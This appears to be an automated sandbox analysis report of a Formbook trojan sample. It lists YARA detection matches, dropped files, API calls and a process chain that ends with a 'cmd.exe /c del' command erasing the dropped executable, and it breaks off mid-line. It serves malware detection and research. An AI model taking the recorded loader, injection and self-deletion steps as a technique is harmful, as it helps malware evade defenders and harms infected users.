          Source: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.359645033.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.359645033.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.359645033.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.572527306.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.572527306.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.572527306.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.572610392.00000000007C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.572610392.00000000007C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.572610392.00000000007C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.572645078.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.572645078.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.572645078.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.318721808.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.318721808.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.318721808.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: afhjjq.exe PID: 4088, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: afhjjq.exe PID: 2236, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: control.exe PID: 4980, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: YSpCB8DEek.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 1.2.afhjjq.exe.12f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.afhjjq.exe.12f0000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.afhjjq.exe.12f0000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.afhjjq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.afhjjq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.afhjjq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.afhjjq.exe.12f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.afhjjq.exe.12f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.afhjjq.exe.12f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.afhjjq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.afhjjq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.afhjjq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.359645033.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.359645033.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.359645033.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.572527306.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.572527306.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.572527306.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.572610392.00000000007C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.572610392.00000000007C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.572610392.00000000007C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.572645078.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.572645078.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.572645078.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.318721808.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.318721808.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.318721808.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: afhjjq.exe PID: 4088, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: afhjjq.exe PID: 2236, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: control.exe PID: 4980, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeCode function: 0_2_00406D5F0_2_00406D5F
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 1_2_013224951_2_01322495
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 1_2_02B131E71_2_02B131E7
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 1_2_02B133561_2_02B13356
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041E0922_2_0041E092
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041E2A82_2_0041E2A8
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041E3542_2_0041E354
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041EB092_2_0041EB09
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041DBE22_2_0041DBE2
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041D5632_2_0041D563
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041D5662_2_0041D566
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_00402D882_2_00402D88
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_00409E4B2_2_00409E4B
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_00409E502_2_00409E50
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041E7E02_2_0041E7E0
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_013224952_2_01322495
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: String function: 01322A5C appears 70 times
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: String function: 01321E8A appears 44 times
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041A320 NtCreateFile,2_2_0041A320
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041A3D0 NtReadFile,2_2_0041A3D0
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041A450 NtClose,2_2_0041A450
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041A500 NtAllocateVirtualMemory,2_2_0041A500
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041A31A NtCreateFile,2_2_0041A31A
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041A4FA NtAllocateVirtualMemory,2_2_0041A4FA
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\afhjjq.exe C9050FBAD700FC0418AAAB01231CF06AC3505F581846C075774E1D3EA5967F49
          Source: YSpCB8DEek.exeReversingLabs: Detection: 48%
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeFile read: C:\Users\user\Desktop\YSpCB8DEek.exeJump to behavior
          Source: YSpCB8DEek.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\YSpCB8DEek.exe C:\Users\user\Desktop\YSpCB8DEek.exe
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeProcess created: C:\Users\user\AppData\Local\Temp\afhjjq.exe "C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeProcess created: C:\Users\user\AppData\Local\Temp\afhjjq.exe C:\Users\user\AppData\Local\Temp\afhjjq.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\afhjjq.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeProcess created: C:\Users\user\AppData\Local\Temp\afhjjq.exe "C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlqJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeProcess created: C:\Users\user\AppData\Local\Temp\afhjjq.exe C:\Users\user\AppData\Local\Temp\afhjjq.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\afhjjq.exe"Jump to behavior
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeFile created: C:\Users\user\AppData\Local\Temp\nstD265.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/5@4/3
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AB5
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1352:120:WilError_01
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCommand line argument: 2480580401341_2_01321210
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCommand line argument: 2480580401342_2_01321210
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: YSpCB8DEek.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: afhjjq.exe, 00000001.00000003.310805407.000000001AB80000.00000004.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000001.00000003.316889004.000000001A9F0000.00000004.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000001.00000003.312416658.000000001A9F0000.00000004.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000002.359908889.0000000001340000.00000040.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000003.317205093.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000003.318811835.000000000117B000.00000004.00000020.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000002.359908889.000000000145F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.573963572.0000000004680000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.361687186.00000000044E8000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.573963572.000000000479F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.359586736.0000000004347000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: afhjjq.exe, 00000002.00000002.359776500.00000000012F0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: afhjjq.exe, 00000001.00000003.310805407.000000001AB80000.00000004.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000001.00000003.316889004.000000001A9F0000.00000004.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000001.00000003.312416658.000000001A9F0000.00000004.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000002.359908889.0000000001340000.00000040.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000003.317205093.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000003.318811835.000000000117B000.00000004.00000020.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000002.359908889.000000000145F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.573963572.0000000004680000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.361687186.00000000044E8000.00000004.00000020.00020000.00000000.sdmp, control.exe, 